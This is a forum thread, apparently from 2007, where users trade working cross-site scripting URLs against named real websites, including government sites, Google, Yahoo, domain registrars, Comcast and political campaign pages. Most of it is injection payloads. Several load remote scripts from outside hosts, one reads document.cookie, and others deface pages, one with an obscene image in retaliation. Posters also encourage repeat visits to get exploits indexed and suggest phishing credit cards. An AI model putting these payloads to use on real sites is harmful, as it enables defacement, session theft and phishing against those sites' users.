this one is nice too
(XSS script seen it elsewhere and usage shameless stolen:)

http://www.bmsg.gv.at/cms/site/search.html?query=xss%22%3E%3Cscript%20src=http://files.die-welt.net/s.js%3E%3C/script%3E

If you look at the returned source, you see that there're some more injections possible. And you also see that the web developpers know how to proper encode the data, at least they write it into the HTML comments, heavan knows what's that usefull for ..

http://www.justiz.gv.at/service/content.php?v_search=xss%22%3E%3Cscript%20src=http://files.die-welt.net/s.js%3E%3C/script%3E

original POST converted to GET, and another example for some stupid php "sanitations" (useless as we all know:)

The <title> says ..

http://www.bmlv.gv.at/suche/index.php?query_string=XSS%22%3E%3C/title%3E%3C/head%3E%3Cbody%3E%3Cscript%20src=http://files.die-welt.net/s.js%3E%3C/script%3E

kirke Wrote:
-------------------------------------------------------
> http://www.justiz.gv.at/service/content.php?v_sear
> ch=xss%22%3E%3Cscript%20src=http://files.die-welt.
> net/s.js%3E%3C/script%3E
>
> original POST converted to GET, and another
> example for some stupid php "sanitations" (useless
> as we all know:)


Eh, it's just stupid coders using $_REQUEST[] instead of $_POST

s/just/additional/

[1] http://www.jordanmatter.com/view.asp?url=><script>alert('xss')</script><p

I'm sure there's a null byte error here as well, I haven't quite figured it out yet....

[2] http://europe.nokia.com/A4164022?url=http'%20%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%22%61%6C%65%72%74%28%27%78%73%73%27%29%3B%22%20%69%64%3D%27

That one is kinda nasty because simply changing the url value to the url for some/any file, will cause the user to d/l that file upon clicking the button. (example: http://europe.nokia.com/A4164022?url=http://ckers.org/s.js downloads s.js from ckers.org)

[3] http://www.onemotoring.com.sg/publish/onemotoring/en/popupwebwide/emailurl.popup.html?url=<script>alert('xss')</script> <-- This is great, send xss to your friends!

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 02/19/2007 06:15PM by tx.

that europe nokia one could be improved on. It's nasty just for downloading trojans and stuff, which would be very bad, but also, to make it just more instajavascripty

http://europe.nokia.com/A4164022?url=javascript:alert(%22XSS%22);


or, just onload
http://europe.nokia.com/A4164022?url='%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3Cspan

Whateva floats yo boat ;-)

-Lockdown-

http://www.rawrcore.net

Snap:
http://www.snap.com/php/widgets/no_results.php?query=%3Cscript%3Ealert('xss');%3C/script%3E

http://search.cityguide.aol.com/baltimore/search/search.adp?page=%6C%69%73%74%69%6E%67%73%4C%6F%6E%67%22%3B%61%6C%65%72%74%28%27%78%73%73%27%29%3B%69%3D%22 <- This of course works when searching in any city

-tx @ lowtech-labs.org

I was browsing the pages tagged with xss on del.icio.us and found this:

http://www.google.com/bookmarks/?num=1%22</script><script>alert('xss')</script>
http://del.icio.us/kimoto

It seems to work if you are logged on into Google Bookmarks.

It was used to run this script (to display a fake Google TV :P)
http://hamachiya.com/junk/gtv

Update:
Both Google XSS-es are fixed now.



Edited 3 time(s). Last edit at 02/21/2007 12:13AM by blad3.

Another Google one: Google Search History (you need to subscribe to this service):
http://www.google.com/searchhistory/?hl=en&num=%22%3Cscript%3Ealert('XSS');%3C/script%3E

Btw, this is the same parameter...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 02/20/2007 06:14PM by nEUrOO.

I played with this one for a while, and they filtered script tags, single quotes, and escaped double quotes. HTML worked fine though.

http://www.bleacheatingfreaks.com/showPic.php?pic=http://ha.ckers.org<meta http-equiv=refresh content=1;url=http://www.awesomeandrew.net/>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Specially for jungsonn

http://www.redsonn.com/hi/go.php?mickey=&mouse=%27%3C%2Fscript%3E%3Cscript%3Ealert%28String.fromCharCode%2872%2C73%29%29%3C%2Fscript%3E%3B&submit=Foo+this%21

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

http://fusion.kallback.com/k7/vanity3.cfm?DID=111111"><script>alert('xss');</script>"1111

---------
Patience is a waste of time.

http://saybox3.co.uk/checkuser.php?username=<script>alert('Hopefully you will see this on your logs, and fix the hole.');location.href='http://www.awesomeandrew.net';</script>&name=&age=


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Search FBN-Security Bloggers Network:
http://www.lijit.com/pvs/FBN-Security%20Bloggers%20Network?q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%7D&pvssearchtype=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%7D

Found here:
http://jeremiahgrossman.blogspot.com/2007/02/automated-scanners-vs-low-hanging-fruit.html#links

;)

Greetings,
.mario

http://www.ctcvista.org/directory/organizations?sort=desc&order=Organization"onload="alert('xss');

Why oh why would somebody echo the url (unfiltered) into the <body> tag as its id?!

-tx @ lowtech-labs.org

Namecheap.com uses HelpSpot for their support center which is vulnerable to XSS.
[[url=http://www.namecheap.com/support/index.php?pg=request.check&id=%3C/title%3E%3C/head%3E%3Cbody%20onload=%22javascript:document.title='Namecheap.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Cbr%3Edaltd%20uNF!';%22%3E&submit=Check]www.namecheap.com[/url]]

[[url=https://www.godaddy.com/gdshop/radio/popup_pic.asp?se=%2B&ci=5291&app_hdr=0&display=../img_posterlrg.png%22%3E%3Cbody%20onload=%22javascript:document.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!';%22%3E%3Cdiv%20id=%22]www.godaddy.com[/url]]
[[url=https://www.networksolutions.com/help/sales-contact.jsp?callingPage=%22%3E%3Cbody%20onload=%22javascript:document.title='Networksolutions.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF%3C/center%3E';%22%3E]www.networksolutions.com[/url]]
[[url=http://marketplacepro.moniker.com/search/cat/11243936/keyword/s:%3Cbody%20onload=%22document.title='marketplacepro.moniker.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Cbr%3Edaltd&nbsp;uNF!';%22%3E/]marketplacepro.moniker.com[/url]]
[[url=https://www.namesecure.com/en_US/jhtml/dcs-docs/whois_popup.jhtml?domainname=%22%3E%3Cbody%20onload=%22javascript:document.title='NameSecure.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E&tld=com]www.namesecure.com[/url]]
[[url=http://www.enom.com/auctions/auctions.asp?page=premium&type=%3C/script%3E%3Cbody%20onload=%22javascript:document.title='eNom.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E]www.enom.com[/url]]
[[url=https://secure.registerapi.com/KM/KnowledgeBase/script_search_documents.php?account_name=4798&search_advanced=0&search_type=data_keywords&search_string=%22%3E%3Cscript%3Edocument.title='secure.registerapi.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%3C/script%3E]secure.registerapi.com[/url]]



Edited 6 time(s). Last edit at 02/23/2007 08:46PM by daltd.

Hello China!
------------

http://search.zol.com.cn/s/search.php?keyword=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22

http://bbs.book.sina.com.cn/?h=javascript:alert('xss');document.location='http://www.google.com';

http://watsagri.nstl.gov.cn/SPT--QuickSearch.php?F_SearchString=<script>alert(String.fromCharCode(88,83,83))//</script>

http://www.whjtj.gov.cn/search.php?type=&keyword=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22

http://passport.pchome.net/login.php?username="><script>alert('hello%20pxss')</script><p%20id="
^ This one is kind of interesting, doesn't alert on the page at passport.pchome.net, but if the user then navigates to my.pchome.net the script executes (IE only, I think... couldn't make FF alert, but I could see that the vector persists through the subdomains.)

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/22/2007 04:36PM by tx.

[[url=https://www.joker.com/faq/index.php?search=%3Cbody%20onload=%22javascript:document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E&num=50]www.joker.com[/url]]
[[url=http://www.sedo.com/faq/index.php?action=search&suchbegriff=%22%3E%3Cscript%3Edocument.body.innerHTML=String.fromCharCode(60,99,101,110,116,101,114,62,60,98,114,62,100,97,108,116,100,32,117,78,70,33,60,98,114,62,60,98,114,62);%3C/script%3E]www.sedo.com[/url]]
[[url=http://www.registar.com/mydomains.cgi?email=domain@domain.com%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E]www.registar.com[/url]]
[[url=https://secure.directnic.com/help/faq/search.php?search=domain.com%22%3E%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E%3Cdiv%20id=%22]secure.directnic.com[/url]]
[[url=http://www.history.com/cite.do?title=%3Cbody%20onload=%22javascript:document.title='History.com%20-%20XSS%20PoC';%20document.body.innerHTML='<center><br>daltd%20uNF!</center>';%22%3E&url=http://sla.ckers.org/]www.history.com[/url]]



Edited 2 time(s). Last edit at 02/23/2007 08:44PM by daltd.

Nice findings daltd ;p

Here's something for people to try if you're short on xss-worth-while sites. Make a list of all the websites that come up during tv commercials :p
I'm sure I found a little something in lloydstsb.com the other day. Anyway, here's one for starters:

http://www.channel4.com/entertainment/games/chart.jsp?genre=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

SystemOfAHack, thanks.

[[url=http://www.facebattle.com/registercomplete.aspx?emailaddress=domain@domain.com%22%3Cscript%3Edocument.title='facebattle.com%20-%20daltd';%20alert('xss');%3C/script%3E]www.facebattle.com[/url]]
[[url=http://www.catholic.net/linksframe.phtml?link=Catholic.net%20-%20XSS%20PoC%3C/title%3E%3C/head%3E%3Cbody%20onload=%22javascript:document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3Cbr%3E%3Cimg%20src=http://mad.girls-eater.com/dtr/thumbs/ce2e62.jpg%3E%3C/center%3E';%22%3E%3Cdiv%20id=%22]www.catholic.net[/url]]
[[url=http://www.kidney.org/site/exit_page.cfm?ch=203&link=domain.com%22%3E%3Cbody%20onload=%22javascript:document.title='Kidney.org%20-%20National%20Kidney%20Foundation%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E%3Cdiv%20id=%22]www.kidney.org[/url]]
[[url=http://content.scholastic.com/browse/searchHelp.jsp?query=%3Cbody%20onload=%22javascript:document.title='content.scholastic.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E]content.scholastic.com[/url]]
[[url=http://videosearch.comcast.net/ss-query/videosearch.jsp?q=%22%3E%3Cbody%20onload=%22javascript:document.title='videosearch.comcast.net%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E%3Cdiv%20id=%22]videosearch.comcast.net[/url]]

I would also like to mention that all the comcast.com and comcast.net XSS vulnerabilities posted here are still %100 working at the time of this post, if anyone cares: [[url=http://sla.ckers.org/forum/read.php?3,44,4045#msg-4045]1[/url]] [[url=http://sla.ckers.org/forum/read.php?3,44,812#msg-812]2[/url]] [[url=http://sla.ckers.org/forum/read.php?3,44,796#msg-796]3[/url]]

later.

Do me a favor, and continually visit this one until Google decides to put it up on their results. If you are religious, offended by Atheism, or would become sick at the sight of Goatse, don't click it. I just figured I'd provide some payback for the call I received on my cell phone.

http://www.krks.com/common/player/swn/CustomPlayer.asp?url=&MinTitle=</title>Awesome%20AnDrEw%20says,%20"Don't%20ever%20call%20my%20phone%20asking%20if%20I've%20been%20forgiven%20by%20the%20"Savior%20Jesus%20Christ".%20Do%20I%20call%20you%20wondering%20whether%20you've%20learned%20that%20the%20bullshit%20you've%20been%20force%20fed%20your%20entire%20life%20has%20taken%20hold%20of%20your%20free%20will?%20Don't%20fucking%20solicit%20me%20again,%20thanks.<br><img%20src="http://www.goatse.cz/hello.jpg"><!--


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

http://www.ticketweb.com/user/?region=xxx&query=search&category=misc&search=%3Cscript%3E+alert%28%27xss%27%29%3B%3C%2Fscript%3E&searchregion=xxx&genre=none&beginmonth=02&beginday=23&beginyear=2007&endmonth=02&endday=23&endyear=2008&sortorder=0
http://www.tickets.com/search.cgi?q=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

Would be interesting to hack a bands myspace and post a link to "Buy Tickets" for some show... Then just phish CC and stuff.

-bubbles
http://webmastertutorials.net



Edited 1 time(s). Last edit at 02/23/2007 04:28PM by bubbles.

http://www.blinkbits.com/search/search.php?q=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E
http://www.merck.com/mrksearch/SearchServlet?HeaderImage=&HeaderImageAlt=&qt=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22%20
http://monsanto.mediaroom.com/index.php?s=43"><script>alert('xss1');</script>&item=457"><script>alert('xss2');</script> <- doesn't work in FF
http://monsanto.mediaroom.com/index.php?s=82&query=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22

[Edit: let's add a few more..]
http://www.halliburton.com/default/main/halliburton/eng/news/source_files/news.jsp?newsurl=javascript:alert('xss');
http://www.halliburton.com/default/main/halliburton/eng/news/source_files/news.jsp?newsurl=--%3E%3Cscript%3Ealert('xss');%3C/script%3E%3C!-- <-same variable, different area in the page.

http://www.carlyle.com/eng/search/default.asp?SearchText=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E%3Cp+id%3D%22&SubmitButton.x=31&SubmitButton.y=8
http://my.barackobama.com/page/user/manage?uu=%22%00%0a%0d%3e%3C%2F%6E%6F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3B%3C%2F%73%63%72%69%70%74%3E [Login with the following info and it will gladly redirect you to the exploit U:jquest@mytrashmail.com P:hajji ]
http://www.votehillary.org/CMS/forward/%3Cimg%20src=%22fds%22onerror=%22alert(String.fromCharCode(88,83,83))%22%3E
http://www.draftrudygiuliani.com/read_article.php?id=655%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22
http://www.gohunter08.com/comtools/e-photogallery/displayContent.asp?action=1C0A0E1D0C07&text=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3Cp%20id=%22

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 02/23/2007 07:31PM by tx.

Looks like Namecheap removed the software they were using for their support system so the previous XSS vulnerability I posted is no longer active, either way here's another one I found:

[[url=https://www.namecheap.com/domain-pricing.asp?fieldno=0&orderby=ASC&Pane=show&tld=cc%22%3E%3Cbody%20onload=%22document.title='Namecheap.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E&pricefor=register]www.namecheap.com[/url]]

With all the recent stuff surrounding google i thought i would check out how secure yahoo was in comparison... cause I have never really bothered to audit the domain so to speak. anyways within 5 minutes i had my first xss.

http://cosmos.bcst.yahoo.com/scp_v3/viewer/index.php?pid=16471&rn=248153;alert(document.cookie);p=1&cl=1939839&ch=248154

hopefully there is many more to come.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

[[url=http://www.realpics.net/forums/28/105148/edit/?');document.title=String.fromCharCode(82,101,97,108,112,105,99,115,46,110,101,116,32,45,32,88,83,83,32,80,111,67);document.body.innerHTML=String.fromCharCode(60,99,101,110,116,101,114,62,60,98,114,62,100,97,108,116,100,32,117,78,70,33);alert('XSS]www.realpics.net[/url]] : Click on the Alert Moderator link
[[url=http://www.imdb.com/gallery/granitz/5335/FreddyRodr_Grani_11250280_400.jpg.html?path=%22%3E%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert(%22XSS%22)%3C/SCRIPT%3E]www.imdb.com[/url]]
[[url=http://javascript.about.com/gi/dynamic/offsite.htm?site=XSS%20PoC%3C/title%3E%3C/head%3E%3Cbody%20onload=%22document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E]javascript.about.com[/url]]

#2 for yahoo \0/

this one is a two parter in that it requires you to click the link returned from the 302 response. Tried all type of response splitting with no luck.

http://shopping.yahoo.co.uk/ctl/go/displayLink?link=javascript:alert('xss');

EDIT [Appears to affect all yahoo "shopping" domains - making it effective against all Yahoo sites.. except the .com version :( here are a couple]
http://shopping.yahoo.it/ctl/go/displayLink?userClick=true&link=javascript:alert('xss');
http://shopping.yahoo.no/ctl/go/displayLink?link=javascript%3Aalert%28%27xss%27%29%3B


Thank you apache for default configuration settings and yahoo for not implementing standardized error pages across all their servers.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 02/24/2007 08:42AM by digi7al64.

http://www.esso.de/cgi-bin/htsearch.cgi?config=esso.de-htdig&restrict=http%3A%2F%2Fwww.esso.de%2F&exclude=&words=%22%3E%3Cdiv+style%3D%22position%3Aabsolute%3B+top%3A+0px%3B+left%3A+0px%3B+width%3A+100%25%3B+height%3A+100%25%3B+background-color%3A+%23f00%3B%22%3Epwned%3C%2Fdiv%3E&x=0&y=0